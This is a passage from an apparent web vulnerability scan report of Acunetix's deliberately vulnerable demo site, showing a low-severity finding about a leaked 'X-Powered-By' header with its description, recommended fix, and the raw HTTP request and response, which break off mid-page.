style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        36. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBl